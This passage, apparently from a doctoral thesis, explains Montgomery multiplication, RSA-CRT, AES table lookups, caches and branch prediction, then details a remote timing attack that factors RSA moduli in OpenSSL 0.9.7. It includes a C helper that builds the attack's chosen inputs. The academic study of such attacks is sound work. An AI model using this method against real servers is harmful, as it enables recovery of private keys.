Montgomery Multiplication is used to calculate Z = A * B * R^(-1) (mod N), where A and B are the N-residues of a and b with respect to R, R is a constant power of 2, and R^(-1) is the inverse of R modulo N: A = a * R (mod N), B = b * R (mod N), R^(-1) * R = 1 (mod N), and R > N. Another constraint is that R has to be relatively prime to N. But since N is a product of two large primes in RSA, choosing R as a power of 2 is sufficient to guarantee that these two numbers are relatively prime. Let N be a k-bit odd number; then 2^k is the most suitable value for R. A conversion to and from N-residue format is required to use this algorithm. Hence, it is most attractive for repeated multiplications on the same residue, just like modular exponentiations. Figure 2.5 shows the algorithm to compute a Montgomery multiplication.

    S = A * B
    S = (S - (S * N^(-1) mod R) * N) / R
    if S > N then S = S - N
    return S

FIGURE 2.5. Montgomery Multiplication Algorithm

The conditional subtraction (S - N) in the third line is called 'extra reduction'. This conditional subtraction step is the main source of data-dependent execution time variations exploited in classical timing attacks on RSA (c.f. Chapter 3 and [6, 21, 34, 85, 88]).
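To make the role of the extra reduction explicit, the following Python sketch implements a word-free Montgomery multiplication and reports whether the conditional final subtraction was taken. Note that it uses the common additive formulation (with -N^(-1) mod R), which keeps intermediate values non-negative; it is an illustration of the technique rather than a transcription of Figure 2.5 or of the OpenSSL code.

    def montgomery_multiply(a_bar, b_bar, N, R):
        """Montgomery product a_bar * b_bar * R^{-1} mod N; also returns whether
        the data-dependent 'extra reduction' (final conditional subtraction) occurred.
        R must be a power of two with R > N and gcd(R, N) = 1."""
        N_prime = (-pow(N, -1, R)) % R    # -N^{-1} mod R
        T = a_bar * b_bar
        m = (T * N_prime) % R
        S = (T + m * N) // R              # exact division: T + m*N is a multiple of R
        if S >= N:                        # the conditional 'extra reduction'
            return S - N, True
        return S, False

    # Toy example: convert to N-residue (Montgomery) form, multiply, and verify.
    N, R = 2947, 4096                     # small odd modulus and R = 2^12 > N
    a, b = 1234, 2001
    a_bar, b_bar = (a * R) % N, (b * R) % N
    prod_bar, extra = montgomery_multiply(a_bar, b_bar, N, R)
    assert prod_bar == (a * b * R) % N    # result is still in Montgomery form

Whether the extra reduction occurs depends on the operands, and hence indirectly on the secret exponent and the input — this is the data dependence that Chapter 3 exploits.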
2.1.4. Chinese Remainder Theorem

The Chinese Remainder Theorem (CRT) is one of the oldest and most famous theorems in number theory. We do not explain the details of CRT in this document, but only its use to speed up RSA operations. Instead of computing P = M^d (mod N) directly, a more complex method can be used to perform the same operation roughly 4 times faster. The algorithm is described in Figure 2.6. Using the Chinese Remainder Theorem, we replace a modular exponentiation with the full-length modulus N by two modular exponentiations with the half-length moduli p and q. Note that this method can only be used by the owner of the secret key, since it requires the knowledge of the factors of N.

    Step 1: a) u_p := M (mod p)
            b) d_p := d (mod p - 1)
            c) P_1 := u_p^(d_p) (mod p)
    Step 2: a) u_q := M (mod q)
            b) d_q := d (mod q - 1)
            c) P_2 := u_q^(d_q) (mod q)
    Step 3: Return ((p^(-1) (mod q)) * (P_2 - P_1) (mod q)) * p + P_1

FIGURE 2.6. RSA with CRT
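A direct Python transcription of Figure 2.6 is given below (an illustrative sketch with toy parameters, not production code); it checks that the CRT result matches the straightforward computation M^d mod N.

    def rsa_crt_decrypt(M, d, p, q):
        """RSA decryption with CRT as in Figure 2.6."""
        u_p, u_q = M % p, M % q
        d_p, d_q = d % (p - 1), d % (q - 1)
        P1 = pow(u_p, d_p, p)              # half-length exponentiation mod p
        P2 = pow(u_q, d_q, q)              # half-length exponentiation mod q
        p_inv_q = pow(p, -1, q)            # p^{-1} mod q
        return ((p_inv_q * (P2 - P1)) % q) * p + P1

    # Toy parameters for the check only (real moduli are 1024 bits or more).
    p, q, e = 61, 53, 17
    N = p * q
    d = pow(e, -1, (p - 1) * (q - 1))
    M = 65
    C = pow(M, e, N)
    assert rsa_crt_decrypt(C, d, p, q) == pow(C, d, N)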
2.2. Basics of AES and Its Implementations

2.2.1. Overview of AES

Rijndael [31] is a symmetric block cipher, which was announced as the Advanced Encryption Standard (AES) by NIST [8]. AES allows key sizes of 128, 192, and 256 bits, and operates on 128-bit blocks. For simplicity, we describe only the 128-bit key version of the algorithm in this document.

AES performs operations on a 4x4 byte matrix, called the State, which is the basic data structure of the algorithm. The algorithm is composed of a certain number of rounds depending on the length of the key. When the key is 128 bits long, the encryption algorithm has 10 rounds of computations, all except the last of which perform the same operations. Each round has different component functions and a round key, which is derived from the original cipherkey. The four component functions are

1. SubBytes Transformation,
2. ShiftRows Transformation,
3. MixColumns Transformation,
4. and AddRoundKey Operation.

The AES encryption algorithm has an initial application of the AddRoundKey operation followed by 9 rounds and a final round. The first 9 rounds use all of these component functions in the given order. The MixColumns Transformation is excluded in the last round. A separate key scheduling function is used to generate all of the round keys, which are also represented as 4x4 byte matrices, from the initial key. The details of the algorithm can be found in [31] and [8].

2.2.2. AES Software Implementations

The primary concern of software implementations of AES is efficiency in terms of speed. Many efficient implementations have been proposed since the selection of Rijndael as AES. In this document, we focus on the one described in [31], which is the most efficient and the most widely used one. In this implementation, all of the component functions, except AddRoundKey, are combined into four different tables, and the rounds turn out to be composed of table lookups and bit-wise xor operations (Figure 2.7). Before the first round, there is an extra round key addition, which adds the cipherkey to the state that holds the actual plaintext. In other words, the input to the first table lookup is the bitwise addition of the plaintext and the cipherkey.

FIGURE 2.7. Round operations in AES

The most widely used software implementation of AES is described in [31] and it is designed especially for 32-bit architectures. To speed up encryption, all of the component functions of AES, except AddRoundKey, are combined into lookup tables and the rounds turn out to be composed of table lookups and bitwise exclusive-or operations. The five lookup tables T0, T1, T2, T3, T4 employed in this implementation are generated from the actual AES S-box values in the following way:

    T0[x] = (2 • s(x), s(x), s(x), 3 • s(x))
    T1[x] = (3 • s(x), 2 • s(x), s(x), s(x))
    T2[x] = (s(x), 3 • s(x), 2 • s(x), s(x))
    T3[x] = (s(x), s(x), 3 • s(x), 2 • s(x))
    T4[x] = (s(x), s(x), s(x), s(x)),

where s(x) and • stand for the result of an AES S-box lookup for the input value x and the finite field multiplication in GF(2^8) as it is realized in AES, respectively. The round computations, except in the last round, are of the form

    (S^{r+1}_{4i}, S^{r+1}_{4i+1}, S^{r+1}_{4i+2}, S^{r+1}_{4i+3}) =
        (RK^{r+1}_{4i}, RK^{r+1}_{4i+1}, RK^{r+1}_{4i+2}, RK^{r+1}_{4i+3})
        ⊕ T0[S^r_{4i}] ⊕ T1[S^r_{(4i+5) mod 16}] ⊕ T2[S^r_{(4i+10) mod 16}] ⊕ T3[S^r_{(4i+15) mod 16}],

where S^r_i is byte i of the intermediate state value that becomes the input of round r, RK^r_i is the i-th byte of the r-th round key, and i ∈ {0, ..., 3}.
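To illustrate how such a table-lookup round works in practice, here is a schematic Python sketch of a single column computation following the formula above. The helper name and calling convention are assumptions for the illustration: the real tables T0–T3 each hold 256 precomputed 32-bit words derived from the S-box, and the round key is assumed to be packed as four 32-bit words. The point relevant to this thesis is that the table indices are key- and data-dependent, so the cache lines they touch leak information.

    def round_column(state, rk_words, i, T0, T1, T2, T3):
        """One column of an AES T-table round (cf. the formula above).
        state: 16 intermediate bytes entering round r;
        rk_words: the next round key as four 32-bit words; T0..T3: 256-entry tables."""
        return (rk_words[i]
                ^ T0[state[4 * i]]
                ^ T1[state[(4 * i + 5) % 16]]
                ^ T2[state[(4 * i + 10) % 16]]
                ^ T3[state[(4 * i + 15) % 16]])   # indices are key/data dependent

    # Purely structural demonstration with dummy tables (NOT the real AES tables).
    T_dummy = [list(range(256)) for _ in range(4)]
    state = list(range(16))                        # toy 16-byte state
    rk_words = [0x01020304, 0x05060708, 0x090A0B0C, 0x0D0E0F10]
    columns = [round_column(state, rk_words, i, *T_dummy) for i in range(4)]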
2.3. Basics of Computer Microarchitecture: Cache and Branch Prediction

In this section, we outline the basics of some processor components which have been identified as sources of side-channel leakage. Although it is beneficial — in order to completely understand the attacks described later — to know many details about modern computer architecture and especially about cache and branch prediction schemes, it is unrealistic to explain all these subtle details here. Thus, we refer the reader to [78, 91, 92] for a thorough treatment of these topics. Nevertheless, we now explain the basic concepts common to most cache and branch prediction units, although the exact details differ from processor to processor and are not completely documented in freely available processor manuals.

2.3.1. Processor Cache

A high-frequency processor needs to retrieve data at a very high speed in order to utilize its functional resources. The latency of main memory is not short enough to match this demand for high-speed data delivery. The gap between the latency of main memories and the actual demand of processors has been increasing and will continue to increase as Moore's Law holds. Common to all processors, the attempt to close this gap is the employment of a special buffer called a cache.

A cache is a small and fast memory area used by the processor to reduce the average time to access main memory. It stores copies of the most frequently used data. (Although this depends on the particular data replacement policy, this assumption holds almost all the time for current processors.) Employment of a cache in a processor reduces the average memory access time because data, including instructions, has several locality properties that can be taken advantage of. Temporal locality is one of these properties, and it exploits the assumption that recently used data will probably be needed again in the near future. The other property is spatial locality, which assumes that data located near a currently used item will also be needed in the near future.

When the processor needs to read a location in main memory, it first checks to see if the data is already in the cache. If the data is already in the cache (a cache hit), the processor immediately uses this data instead of accessing the main memory, which has a longer latency than the cache. Otherwise (a cache miss), the data is read from memory and a copy of it is stored in the cache. This copy is expected to be used in the near future due to the temporal locality property. The minimum amount of data that can be read from the main memory into the cache at once is called a cache line or a cache block, i.e., each cache miss causes a cache block to be retrieved from a higher-level memory. The reason why a block of data is transferred from the main memory to the cache, instead of transferring only the data that is currently needed, lies in the spatial locality property.

Design and implementation of a cache take several parameters into consideration in order to meet the desired cost/performance metrics. These parameters include:

• number of levels of cache
• size of these caches
• latency of these caches
• penalty of a cache miss in these levels
• size of a cache block in these levels
• overhead of updating main memory and higher-level caches

Further details on these parameters and the specific values used in particular processors are not given in this document, but can be found in [43, 78, 39].

Before moving on to the next section, where we describe the basics of branch prediction, we want to mention two very important concepts that affect the performance of a cache: the mapping strategy and the replacement policy. The cache mapping strategy is the method of deciding where to store, and thus where to search for, a piece of data in a cache. The three main cache mapping strategies are direct, fully associative, and set associative mapping. In a direct mapped cache, a particular data block can only be stored in a single, fixed location in the cache. On the contrary, a data block can be placed in any location in a fully associative cache; the location of a particular placement is determined by the replacement policy. Set associative mapping is a blend of these two mapping strategies. Set associative caches are divided into a number of equally sized sets, and each set contains the same fixed number of cache blocks. A data block can be stored only in a certain cache set (just like in a direct mapped cache); however, it can be placed in any location inside this set (like in a fully associative cache). Again, the particular location of a data block inside its cache set is determined by the replacement policy.

The replacement policy is the method of deciding which data block to evict from the cache in order to make room for a new one. The ultimate goal is to choose the data that is least likely to be used in the near future. There are several cache replacement policies proposed in the literature (c.f. [43, 78]). In this document, we focus on a specific one: least-recently-used (LRU). It is the most commonly used policy, and it evicts the block that was least recently used among all of the candidate blocks.
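To make the set-associative mapping concrete, the following small Python sketch computes which set a memory address maps to. The cache geometry used here (64-byte lines, 128 sets) is a hypothetical example chosen for illustration, not the geometry of any specific processor; cache attacks use exactly this arithmetic to decide which addresses contend for the same cache set.

    def cache_set_index(address, line_size=64, num_sets=128):
        """Return the set index an address maps to in a set-associative cache:
        the line-offset bits are discarded, the next bits select the set."""
        return (address // line_size) % num_sets

    # Two addresses that differ by line_size * num_sets collide in the same set,
    # so loading enough such conflicting lines can evict the victim's data.
    a = 0x12345678
    b = a + 64 * 128
    assert cache_set_index(a) == cache_set_index(b)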
Thus, it is not surprising that there has been a vibrant and very practical research on more and more sophisticated branch prediction mechanisms, c.f. [78, 91, 92]. Unfortunately we identify branch prediction as a novel and unforeseen side-channel, thus being another new security threat within the computer security field. Superscalar processors have to execute instructions speculatively to overcome control hazards, c.f. [92, 78]. The negative effect of control hazards on the 29 effective machine performance increases as the depth of pipelines increases. This fact makes the efficiency of speculation one of the key issues in modern superscalar processor design. The solution to improve the efficiency is to speculate on the most likely execution path. The success of this approach depends on the accuracy of branch prediction. Better branch prediction techniques improve the overall performance a processor can achieve, c.f. [92, 78]. A branch instruction is a point in the instruction stream of a program where the next instruction is not necessarily the next sequential one. There are two types of branch instructions: unconditional branches (e.g. jump instructions, goto statements, etc.) and conditional branches (e.g. if-then-else clauses, for and while loops, etc.). For conditional branches, the decision to take or not to take the branch depends on some condition that must be evaluated in order to make the correct decision. During this evaluation period, the processor speculatively executes instructions from one of the possible execution paths instead of stalling and awaiting for the decision to come through. Thus, it is very beneficial if the branch prediction algorithm tries to predict the most likely execution path in a branch. If the prediction is true, the execution continues without any delays. If it is wrong, which is called a misprediction, the instructions on the pipeline that were speculatively issued have to be dumped and the execution starts over from the mispredicted path. Therefore, the execution time suffers from a misprediction. The misprediction penalty obviously increases in terms of clock cycles as the depth of pipeline extends. To execute the instructions speculatively after a branch, the CPU needs the following information: • The outcome of the branch. The CPU has to know the outcome of a branch, i.e., taken or not taken, in order to execute the correct instruction sequence. However, this information is not available immediately when a branch is 30 issued. The CPU needs to execute the branch to obtain the necessary information, which is computed in later stages of the pipeline. Instead of awaiting the actual outcome of the branch, the CPU tries to predict the instruction sequence to be executed next. This prediction is based on the history of the same branch as well as the history of other branches executed just before the current branch, cf. [92]. • The target address of the branch. The CPU tries to determine if a branch needs to be taken or not taken. If the prediction turns out to be taken, the instructions in the target address have to be fetched and issued. This action of fetching the instructions from the target address requires the knowledge of this address. Similar to the outcome of the branch, the target address may not be immediately available too. Therefore, the CPU tries to keep records of the target addresses of previously executed branches in a buffer, the so called Branch Target Buffer (BTB). 
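To make these two structures more concrete, the following C fragment is a simplified software model of a BPU consisting of a small direct-mapped BTB and a table of 2-bit saturating counters. It only illustrates the prediction logic sketched above; the sizes, the indexing by low-order address bits, and the update policy are our own simplifying assumptions and do not correspond to any particular processor.

#include <stdint.h>
#include <stdbool.h>

#define BTB_ENTRIES 512                 /* illustrative sizes, not a real CPU */
#define PHT_ENTRIES 1024

typedef struct {
    uint64_t tag;                       /* branch (source) address            */
    uint64_t target;                    /* last observed target address       */
    bool     valid;
} btb_entry_t;

static btb_entry_t btb[BTB_ENTRIES];
static uint8_t     pht[PHT_ENTRIES];    /* 2-bit counters: 0..3, >= 2 = taken */

/* Predict outcome and target for a branch at address pc. If the counter says
 * "taken" but the BTB holds no target, the fetch unit cannot follow the taken
 * path anyway, so the model falls back to "not taken".                       */
static bool predict(uint64_t pc, uint64_t *predicted_target) {
    btb_entry_t *e = &btb[(pc >> 2) % BTB_ENTRIES];
    bool taken = pht[(pc >> 2) % PHT_ENTRIES] >= 2;
    if (taken && e->valid && e->tag == pc) {
        *predicted_target = e->target;
        return true;
    }
    return false;
}

/* Update the predictor once the real outcome of the branch is known. */
static void update(uint64_t pc, bool taken, uint64_t target) {
    uint8_t *ctr = &pht[(pc >> 2) % PHT_ENTRIES];
    if (taken  && *ctr < 3) (*ctr)++;
    if (!taken && *ctr > 0) (*ctr)--;
    if (taken) {                        /* allocate or refresh the BTB entry  */
        btb_entry_t *e = &btb[(pc >> 2) % BTB_ENTRIES];
        e->tag = pc; e->target = target; e->valid = true;
    }
}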
Overall common to all Branch Prediction Units (BPU) is the following Figure 2.8. As shown, the BPU consists of mainly two “logical” parts, the BTB and the predictor. As said already above, the BTB is the buffer where the CPU stores the target addresses of the previously executed branches. Since this buffer is limited in size, the CPU can store only a number of such target addresses, and previously stored addresses may be evicted from the buffer if a new address needs to be stored instead. The predictor is that part of the BPU that makes the prediction on the outcome of the branch under question. There are different parts of a predictor, i.e., Branch History Registers (BHR) like the global history register or local his- 31 . FIGURE 2.8. Branch Prediction Unit Architecture tory registers, and branch prediction tables, cf. [92]. Further details of branch prediction can be found in [78, 91, 92]. 32 3. REMOTE TIMING ATTACK ON RSA Several timing attacks have been developed against specific RSA implementations since the introduction of side channel cryptanalysis in [59]. For example, [59] and [34] describe timing attacks on RSA implementations which do not utilize Chinese Remainder Theorem (CRT). These attacks were generalized and optimized by advanced stochastic methods (c.f. [86, 88, 87]). Since these attacks cannot be applied to RSA implementations that use CRT, it had been thought for years that RSA-CRT was immune to timing attacks. However, in [85], a new and efficient attack on RSA implementations that use CRT with Montgomery’s multiplication algorithm was introduced. Under optimal conditions, it takes about 300 timing measurements to factorize 1024-bit RSA moduli. We note that these attacks can be prevented by blinding techniques (c.f. [59], Sect. 10). Typical targets of timing attacks are the security features in smart cards. Despite of Bleichenbacher’s attack ( [16]), which (e.g.) exploited weak implementations of the SSL handshake protocol, the vulnerability of RSA implementations running on servers was not known until Brumley and Boneh performed a timing attack over a local network in 2003 ( [21]). They mimicked the attack introduced in [85] to show that RSA implementation of OpenSSL [71], which is the most widely used open source crypto library, was not immune to such attacks. Although blinding techniques for smart cards had already been ‘folklore’ for years, various crypto libraries that were used by SSL implementations did not apply these countermeasures at that time (c.f. [21]). In this section, we present a timing attack, which is an improvement of [21] by a factor of more than 10 [6]. All of these timing attacks ( [59, 34, 88, 33 85, 21]) including the one presented in this chapter can be prevented by base blinding or exponent blinding. However, it is always desirable to understand the full risk potential of an attack in order to confirm the trustworthiness of existing or, if necessary, to develop more secure and efficient countermeasures and implementations. Our attack exploits the peculiarity of the sliding windows exponentiation algorithm and, independently, suggests a general improvement of the decision strategy. Although it is difficult to compare the efficiency of attacks performed in different environments (c.f. [21]), it is obvious that our new attack improves the efficiency of Brumley and Boneh’s attack by a factor of at least 10. 3.1. 
General Idea of a Timing Attack on RSA-CRT

Most of the RSA implementations use the Chinese Remainder Theorem (CRT) to compute the modular exponentiation. CRT reduces the computation time by about 75%, compared to a straight-forward exponentiation (c.f. Section 2.1.4). Montgomery Multiplication (MM) is the most efficient algorithm to compute modular multiplications during a modular exponentiation. Since it eliminates time consuming integer divisions, the efficiency of the algorithm is very high. See Sections 2.1.4 and 2.1.3 for details of these algorithms.

Since the operand size of the arithmetic operations can simply be assumed to be constant during RSA exponentiation, the time required to perform integer operations in MM can also be assumed to depend only on the constants N and R but not on the operands A and B. This assumption is very reasonable for smart cards whereas software implementations may process small operands (i.e., those with leading zero-words) faster due to optimizations of the integer multiplication algorithm. In fact, this is the case for many SSL implementations which complicates the attack described in [21] and ours. (Both attacks are chosen-input attacks where small operands occur.)

1.) ȳ1 := MM(M, R^2; n)   (= M · R (mod n))
2.) Modular Exponentiation Algorithm
    a) table initialization (if necessary)
    b) exponentiation phase
3.) Return MM(temp, 1; n)   (= M^d (mod n))
FIGURE 3.1. Modular Exponentiation with Montgomery's Algorithm

Under the simplifying assumption from above, we can conclude that Time(MM(A, B; N)) ∈ {c, c + c_ER}, where Time(MM(A, B; N)) is the execution time of MM(A, B; N) and MM(A, B; N) is the Montgomery multiplication with the input values A, B, and N. The Montgomery operation requires a processing time of c + c_ER iff the extra reduction has to be carried out. In the rest of this chapter, we denote the public RSA modulus as n instead of the capital letter N, because we need to use N to denote another variable.

Figure 3.1 explains how Montgomery's multiplication algorithm can be combined with arbitrary modular exponentiation algorithms to compute M^d (mod n). The variable temp in Phase 3 represents the result of the exponentiation phase. Of course, in Phase 2a and 2b modular squarings and multiplications have to be replaced by the respective Montgomery operations.

The different attacks [85] and [21] exploit the timing behavior of the Montgomery multiplications in Phase 2b of the modular exponentiation (c.f. Figure 3.1). We can interpret the execution time of the ith Montgomery operation in Phase 2b (squaring or a multiplication by a table value) as a realization of the random variable c + W_i · c_ER, where W_1, W_2, . . . denotes a sequence of {0, 1}-valued random variables. The stochastic process W_1, W_2, . . . has been studied in detail in [86, 85, 87]. We merely mention that

E(W_i) = (1/3) · (n/R)                for MM(temp, temp; n)
E(W_i) = (1/2) · (ȳ_j/n) · (n/R)      for MM(temp, ȳ_j; n),      (3.1)

where ȳ_j and temp denote a particular table entry and an intermediate result during the exponentiation, respectively. 'E(·)' denotes the expectation of a random variable. The timing behavior of the Montgomery operations in Phase 2a) can similarly be described by a process W'_1, W'_2, . . ..

When applying the CRT, (3.1) indicates that the probability of an extra reduction during a Montgomery multiplication of the intermediate result temp with ȳ_{1;p} = M ∗ R (mod p) in Step 1 (resp. with ȳ_{1;q} = M ∗ R (mod q) in Step 2) is linear in ȳ_{1;p}/p (resp. linear in ȳ_{1;q}/q).
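For illustration, the following C sketch shows a single-word Montgomery multiplication with the conditional final subtraction made explicit; the multi-word versions used in real libraries such as OpenSSL follow the same pattern. The flag extra_reduction marks exactly the event whose probability is described by (3.1); the sketch, its restrictions, and its variable names are ours and are not taken from any particular implementation.

#include <stdint.h>
#include <stdbool.h>

/* Single-word Montgomery multiplication MM(a, b; n) = a*b*R^{-1} mod n with
 * R = 2^64. n must be odd and, for this simple sketch, smaller than 2^63 so
 * that the 128-bit intermediate value cannot overflow. n_prime is the
 * precomputed constant -n^{-1} mod 2^64.                                     */
static uint64_t mont_mul(uint64_t a, uint64_t b, uint64_t n, uint64_t n_prime,
                         bool *extra_reduction)
{
    __uint128_t t = (__uint128_t)a * b;
    uint64_t    m = (uint64_t)t * n_prime;            /* m = t * n' mod 2^64  */
    __uint128_t u = (t + (__uint128_t)m * n) >> 64;   /* (t + m*n) / R        */

    *extra_reduction = (u >= n);                      /* data-dependent step  */
    if (*extra_reduction)
        u -= n;      /* the 'extra reduction': executed only sometimes, and   */
                     /* therefore the source of the timing difference c_ER    */
    return (uint64_t)u;
}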
Note that the message (u ∗ R^{-1}) (mod n) corresponds to the value u during the exponentiation, because the messages are multiplied by R to convert them into Montgomery form. If the base of the exponentiation is y := uR^{-1} (mod n), then ȳ_{1;p} = yR ≡ u (mod p) and ȳ_{1;q} = yR ≡ u (mod q). Equation (3.1) also implies that the corresponding probability for the squarings does not depend on y.

For 0 < u1 < u2 < n with u2 − u1 ≪ p, q, three cases are possible: the 'interval set' {u1 + 1, . . . , u2} contains no multiple of p or q (Case A), contains a multiple of p or q but not both (Case B), or contains multiples of both p and q (Case C). The running time for input y := uR^{-1} (mod n), denoted by T(u), is interpreted as a realization of a normally distributed random variable X_u. If the square and multiply exponentiation algorithm is applied, the computation of P1 during the CRT operations (c.f. Figure 2.6) requires about log2(n)/4 multiplications with ȳ_{1;p}, and hence (3.1) implies

E(X_{u2} − X_{u1}) ≈ 0                                           for Case A,
E(X_{u2} − X_{u1}) ≈ − c_ER · (log2(n)/8) · (√n / R)             for Case B,
E(X_{u2} − X_{u1}) ≈ − c_ER · (log2(n)/4) · (√n / R)             for Case C.

This property allows us to devise a timing attack that factorizes the modulus n by exposing one of the prime factors, e.g. q, bit by bit. We use the fact that if the interval (u1, u2], i.e., the integers in {u1 + 1, u1 + 2, ..., u2}, contains a multiple of q, i.e., in case of Case B or C, then T(u1) − T(u2) will be smaller than c_ER · log2(n) · √n / (16R). Let us say the attacker already knows that q is in (u1, u2] (after checking several intervals; this constitutes Phase 1 of the attack) and is trying to reduce the search space. In Phase 2 the decision strategy becomes:

1. Split the interval into two equal parts: (u1, u3] and (u3, u2], where u3 = ⌊(u1 + u2)/2⌋. As usual, ⌊z⌋ denotes the largest integer that is ≤ z.

2. If T(u3) − T(u2) < c_ER · log2(n) · √n / (16R), decide that q is in (u3, u2], otherwise in (u1, u3].

3. Repeat the first two steps until the final interval becomes small enough to factorize n using the Euclidean algorithm.

At any time within Phase 2 the attacker can check whether her previous decisions have been correct. To confirm that an interval really contains q, the attacker applies the decision rule to similar but different intervals, e.g., (u1 + 1, u2 − 1], and confirms the interval if they yield the same decision. In fact, it is sufficient to recover only the upper half of the bit representation of either p or q to factorize n by applying a lattice-based algorithm [27]. Under ideal conditions (no measurement errors) this attack requires about 300 time measurements to factorize a 1024-bit RSA modulus n ≈ 0.7 · 2^1024, if the square and multiply algorithm is used. In Phase 2 of the attack, each decision essentially recovers one further bit of the binary representation of one prime factor. The details and analysis of this attack can be found in [85].

3.2. Overview of Brumley and Boneh Attack

We explain the attack of [21], which will be referred to as the BB-attack from here on, and ours in the following two sections, along with a discussion of the advantages of our attack over the other. The RSA implementation of OpenSSL version 0.9.7 used to employ Montgomery Multiplication, CRT, and Sliding Window Exponentiation (SWE) with a window size, denoted by wsize, of 5.1 The SWE algorithm processes the exponent d by splitting it into odd windows of at most wsize consecutive bits, i.e., into substrings of length ≤ wsize having an odd binary representation, where the windows are not necessarily consecutive and may be separated by zero bits (c.f. Section 2.1.2.3). It requires a preprocessing phase, i.e., table initialization, to compute odd powers of the base y so that many multiplications can be combined during the exponentiation phase.

1 At the time our paper ( [6]) was written, the latest version of the OpenSSL library was 0.9.7.
They changed this particular RSA implementation configuration and started to employ the b-ary exponentiation algorithm, with additional mitigation techniques to protect RSA against cache-based side-channel attacks, starting with version 0.9.8, after the advances in the microarchitectural side-channel area discussed in the later chapters of this document.

The modulus n is a 1024-bit number, which is the product of two 512-bit primes p and q. Considering one of these primes, say q, the computation of y_q^{d_q} (mod q) requires 511 Montgomery operations of type MM(temp, temp; q) ('squarings') and approximately (511 · 31)/(5 · 32) ≈ 99 multiplications with the table entries during the exponentiation phase of SWE (cf. Table 14.16 in [64]). Consequently, on average ≈ 6.2 multiplications are carried out with the table entry ȳ_{1;q}.

The BB-attack exploits the multiplications MM(temp, ȳ_{1;q}; q) that are carried out in the exponentiation phase of SWE. Assume that the attacker tries to recover q = (q_0, ..., q_511) and has already obtained the first, i.e., most significant, k bits. To guess q_k, the attacker generates g and g_hi, where g = (q_0, ..., q_{k−1}, 0, 0, ..., 0) and g_hi = (q_0, ..., q_{k−1}, 1, 0, 0, ..., 0). Note that there are two possibilities for q: g < q < g_hi (when q_k = 0) or g < g_hi < q (when q_k = 1). She determines the decryption times t1 = T(g) = Time(u_g^d mod n) and t2 = T(g_hi) = Time(u_ghi^d mod n), where u_g = g ∗ R^{-1} (mod n) and u_ghi = g_hi ∗ R^{-1} (mod n). If q_k is 0, then |t1 − t2| must be "large". Otherwise |t1 − t2| must be close to zero, which implies that q_k is 1. The message u_g (u_ghi resp.) corresponds to the value g (g_hi resp.) during the exponentiations, because of the conversion into Montgomery form.

The BB-attack does not only compare the timings for gR^{-1} (mod n) and g_hi R^{-1} (mod n) but uses the whole neighborhoods of g and g_hi, i.e., N(g; N) = {g, g + 1, . . . , g + N − 1} and N(g_hi; N) = {g_hi, g_hi + 1, . . . , g_hi + N − 1}, respectively. The parameter N is called the neighborhood size. For details, the reader is referred to [21].

3.3. Details of Our Approach

Only about 6 of the ca. 1254 Montgomery operations performed in an RSA exponentiation provide useful information for the BB-attack. On the other hand, the table initialization phase of the exponentiation modulo q requires 15 Montgomery multiplications with ȳ_2. Therefore, we exploit these operations in our attack. In fact, let R^{0.5} = 2^256 = √R, the square root of R over the integers. Clearly, for input y = u(R^{0.5})^{-1} (mod n) (inverse in the ring Z_n) we have

ȳ_{2;q} = MM(ȳ_1, ȳ_1; q) = u(R^{0.5})^{-1} · u(R^{0.5})^{-1} · R ≡ u^2 (mod q).      (3.2)

Instead of N(g, N) and N(g_hi, N) we consequently consider the neighborhoods N(h; N) = {h, h+1, . . . , h+N−1} and N(h_hi; N) = {h_hi, h_hi+1, . . . , h_hi+N−1}, resp., where

h = ⌊√g⌋ and h_hi = ⌊√g_hi⌋.      (3.3)

To be precise, we consider input values y = u(R^{0.5})^{-1} (mod n) with u ∈ N(h; N) or u ∈ N(h_hi; N). Even if we just directly copy the other steps of the BB-attack, this will increase the efficiency by a factor of ≈ (15.0/6.2)^2 ≈ 5.8.
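To make the construction of the chosen inputs concrete, the following sketch uses the GMP library (which we also use in our implementation, cf. Section 3.4) to derive the j-th neighborhood value from the already recovered bits of q and to convert it into the value that is actually submitted, y = u (R^{0.5})^{-1} (mod n). The function name and its arguments are ours and only illustrate the computation in (3.3) and the paragraph above.

#include <gmp.h>

/* Build the j-th query value of the neighborhood N(h; N): from g (the k
 * recovered most significant bits of q, padded with zeros) compute
 * h = floor(sqrt(g)) as in (3.3), form u = h + j, and return
 * y = u * (R^{0.5})^{-1} (mod n), the value that is actually sent to the
 * server. R_half = 2^256 for a 1024-bit modulus n.                          */
static void build_query(mpz_t y, const mpz_t g, unsigned long j,
                        const mpz_t R_half, const mpz_t n)
{
    mpz_t h, inv;
    mpz_init(h);
    mpz_init(inv);

    mpz_sqrt(h, g);               /* h = floor(sqrt(g))                      */
    mpz_add_ui(h, h, j);          /* u = h + j, the j-th neighbor            */

    mpz_invert(inv, R_half, n);   /* (R^{0.5})^{-1} mod n; in practice this  */
                                  /* inverse would be precomputed once       */
    mpz_mul(y, h, inv);
    mpz_mod(y, y, n);             /* y = u * (R^{0.5})^{-1} mod n            */

    mpz_clear(h);
    mpz_clear(inv);
}

The candidate g_hi is handled in exactly the same way after additionally setting the bit at position 511 − k of g (counting from the least significant bit).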
Under the assumption from Section 3.1, specifically Time(MM(a, b; q)) ∈ {c, c + c_ER} for any a, b ∈ Z_q, we can simply replace the threshold value c_ER · log2(n) · √n / (16R) by 60 · c_ER · √n / (16R). Clearly, the absolute value of this new threshold is much smaller, which makes the attack less efficient in terms of the number of necessary measurements.

The situation in an actual attack is more complicated, as pointed out in [21]. First of all, there are two different integer multiplication algorithms used to compute MM(a, b; q): Karatsuba's algorithm (if a and b consist of the same number of words, nwords) and the 'normal' multiplication algorithm (if a and b consist of different numbers of words, nwords and mwords). Karatsuba's algorithm has a complexity of O(nwords^1.58), whereas the normal multiplication algorithm requires O(nwords · mwords) operations. Normally, the length of each input of a Montgomery multiplication is 512 bits, therefore Karatsuba's algorithm is supposed to be applied during the RSA exponentiation. However, the BB-attack and ours are chosen-input attacks and some operands may be very small, e.g., ȳ_{1;q} in the BB-attack and ȳ_{2;q} in our attack. Beginning with an index (denoting the actual exponent bit under attack) near the word size 32, the value of ȳ_{1;q}, resp. ȳ_{2;q}, has leading zero words so that the program applies normal multiplication. Unfortunately, the effects of having almost no extra reduction for small table values but using less efficient integer multiplications counteract each other. Moreover, the execution time of the integer multiplications becomes smaller and smaller during the course of the attack (normal multiplication algorithm!). It is worked out in [21] that the time differences of the integer multiplications depend on the concrete environment, i.e., compiler options etc. Neither in [21] nor in this chapter do we assume that the attacker knows all of these details. Instead, robust attack strategies that work for various settings are used in both cases.

The BB-attack evaluates the absolute values

